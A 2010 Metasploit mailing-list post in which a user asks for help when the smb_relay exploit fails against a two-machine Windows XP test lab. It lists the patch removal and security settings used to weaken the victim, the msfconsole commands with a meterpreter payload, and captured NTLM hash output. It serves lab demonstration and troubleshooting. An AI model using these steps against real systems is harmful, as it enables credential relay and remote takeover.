Metasploit mailing list archives

smb_relay returns "[-] Failed to authenticate"


From: Christian Schäfer <syrious3000 () hotmail de>
Date: Wed, 29 Dec 2010 20:18:03 +0100


Hello,


I'm just trying to get the smb_relay exploit working on an isolated test-asset consisting of 2 Win XP SP3 machines with 
Metasploit Framework 3.5.1 for demonstration purposes.

attacker: 192.168.69.7 
victim: 192.168.69.3


To get the exploit working I uninstalled the Win Security Update KB957097 (from both machines) which prevents the 
exploit.

After that I set LocalSecuritySettings / LocalPolicies / SecurityOptions / NetworkAccess: Sharing and Security model 
for local accounts to:  "Classic" on the victim.

Then I executed:  gpupdate /force in windows shell


On the attacking machine I set the following network config:

tcp/ip / advanced/wins:  disabled (to get port 139 free)

client for ms networks:   enabled

file & printer sharing...:  enabled

I made a change in the registry (to get port 445 free) by setting:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 
"SMBDeviceEnabled"=dword:00000000


I executed the exploit with the following commands and got a "Failed to authenticate" ...please help :(
(SYRDSL = computer name , test = username and password)

msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(smb_relay) > set SRVHOST 192.168.69.7
SRVHOST => 192.168.69.7
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started bind handler
[*] Server started.
[*] Received 192.168.69.3:1079 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.69.3:1079 \
[*] Received 192.168.69.3:1079 SYRDSL\test LMHASH:3e5a5ee7d3fd22d72fc039c755c14c9c33eb1778f2f939cc NTHASH:1934e7b2bfe1bd8979b505fdcfbc03cc44bd94334991444b OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.69.3 as SYRDSL\test...
[*] Trying to AUTHENTICATE: username= test , domain= SYRDSL
[-] Failed to authenticate as SYRDSL\test...


On the victim machine I tried:

typing in the explorer address line:  \\192.168.69.7\fakeShare\fakeFile.jpg

or in windows shell: net use \\192.168.69.7\ipc$ to trigger the exploit 



I would appreciate any hint...because I urgently need to get it working...please help :/
If I missed some important information, please tell me and I will provide it.

Cheers
Christian
                                          